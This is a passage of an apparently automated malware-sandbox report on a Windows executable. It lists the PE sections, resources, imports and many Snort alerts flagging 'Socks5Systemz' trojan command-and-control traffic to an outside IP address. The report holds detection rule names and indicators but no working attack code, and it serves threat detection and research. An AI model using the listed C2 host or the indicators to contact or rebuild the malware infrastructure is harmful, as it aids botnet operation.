                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        CODE0x10000x92440x940000d95da090f9b045cc52199c7b36d118False0.6099820523648649data6.529731839731562IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        DATA0xb0000x24c0x40039d5f89b5ecafeb0fe902996045df0e7False0.3076171875data2.734702734719094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        BSS0xc0000xe480x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x110000x2c000x2c003c05f08b670faa404567ceb461718a1cFalse0.32279829545454547data4.462019412670872IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                        RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                        RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                        RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                        RT_STRING0x125740x2f2data0.35543766578249336
                                                                        RT_STRING0x128680x30cdata0.3871794871794872
                                                                        RT_STRING0x12b740x2cedata0.42618384401114207
                                                                        RT_STRING0x12e440x68data0.75
                                                                        RT_STRING0x12eac0xb4data0.6277777777777778
                                                                        RT_STRING0x12f600xaedata0.5344827586206896
                                                                        RT_RCDATA0x130100x2cdata1.2045454545454546
                                                                        RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                        RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.2764900662251656
                                                                        RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                                                        Imports

                                                                        DLLImport
                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                        user32.dllMessageBoxA
                                                                        oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                        kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                        user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                        comctl32.dllInitCommonControls
                                                                        advapi32.dllAdjustTokenPrivileges

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        DutchNetherlands
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        03/29/24-12:59:10.764656TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:35.421196TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:59.675457TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:28.814022TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977880192.168.2.445.142.214.240
                                                                        03/29/24-12:58:58.279145TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:52.205310TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:48.200098TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:44.183959TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:29.458062TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:54.762452TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:25.184508TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:17.561359TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:32.211512TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:10.122007TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:21.394081TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:03.387980TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:37.749118TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:24.138039TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:47.153192TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:31.562211TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:18.201077TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976480192.168.2.445.142.214.240
                                                                        03/29/24-12:58:57.434224TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:25.828412TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:44.826160TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:38.599677TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:28.169308TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:32.211512TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978280192.168.2.445.142.214.240
                                                                        03/29/24-13:00:01.144442TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:11.403065TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:14.168811TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:45.464018TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979880192.168.2.445.142.214.240
                                                                        03/29/24-13:00:00.317751TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:48.200098TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:52.843294TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:17.561359TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:09.075777TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:23.090769TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:55.404429TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:36.058657TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:02.340536TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:39.978368TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:31.562211TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:00.626740TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:13.121896TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:24.138039TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:26.471385TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:39.978368TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:18.201077TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:19.483683TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:22.033829TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:01.268339TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:34.777689TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:37.106191TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:07.153408TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:43.547929TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:21.394081TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:49.480506TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:46.108211TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:44.183959TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979680192.168.2.445.142.214.240
                                                                        03/29/24-13:00:01.144442TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:56.055877TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981280192.168.2.445.142.214.240
                                                                        03/29/24-12:58:58.279145TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:52.205310TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:16.918885TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:44.826160TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979780192.168.2.445.142.214.240
                                                                        03/29/24-12:58:59.965425TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:36.058657TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:02.340536TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:59.031292TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:42.903229TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:09.075777TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:07.805203TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:53.482569TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:25.184508TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:20.124059TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976780192.168.2.445.142.214.240
                                                                        03/29/24-13:00:03.080619TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24982080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:11.403065TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:32.856145TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:28.169308TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:54.762452TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:50.109189TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980480192.168.2.445.142.214.240
                                                                        03/29/24-13:00:02.442251TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981980192.168.2.445.142.214.240
                                                                        03/29/24-12:58:57.434224TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24973680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:08.435175TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975280192.168.2.445.142.214.240
                                                                        03/29/24-13:00:01.795965TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:56.055877TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:13.121896TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:33.499589TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:15.452590TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:54.123875TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:49.480506TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:00.626740TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:14.816268TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:50.109189TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:12.050126TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:22.033829TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:27.122910TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:41.029454TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:05.059289TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:20.124059TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:26.471385TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:06.106340TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:19.483683TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:51.153063TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:48.841670TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:18.842102TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:30.918916TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978080192.168.2.445.142.214.240
                                                                        03/29/24-12:58:59.965425TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974280192.168.2.445.142.214.240
                                                                        03/29/24-13:00:02.442251TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:12.050126TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:34.137988TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:16.918885TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:32.856145TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978380192.168.2.445.142.214.240
                                                                        03/29/24-12:58:58.916637TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:27.122910TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:56.945215TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:46.108211TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:34.777689TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:20.762171TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:07.805203TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:42.903229TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:33.499589TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:35.421196TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:03.387980TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974680192.168.2.445.142.214.240
                                                                        03/29/24-13:00:01.795965TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:08.435175TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:41.029454TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979380192.168.2.445.142.214.240
                                                                        03/29/24-12:59:28.814022TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:15.452590TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:47.153192TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:06.106340TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:10.764656TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:37.749118TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979080192.168.2.445.142.214.240
                                                                        03/29/24-13:00:03.080619TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14982080192.168.2.445.142.214.240
                                                                        03/29/24-12:58:58.916637TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:54.123875TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:59.031292TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:53.482569TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:59.675457TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:45.464018TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:20.762171TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:48.841670TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980280192.168.2.445.142.214.240
                                                                        03/29/24-12:59:23.090769TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24977180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:05.059289TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24974880192.168.2.445.142.214.240
                                                                        03/29/24-12:59:51.153063TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:38.599677TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:18.842102TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:55.404429TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981180192.168.2.445.142.214.240
                                                                        03/29/24-12:59:25.828412TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977480192.168.2.445.142.214.240
                                                                        03/29/24-13:00:00.317751TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14981680192.168.2.445.142.214.240
                                                                        03/29/24-12:59:14.816268TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24976080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:43.547929TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24979580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:01.268339TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:56.945215TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24981380192.168.2.445.142.214.240
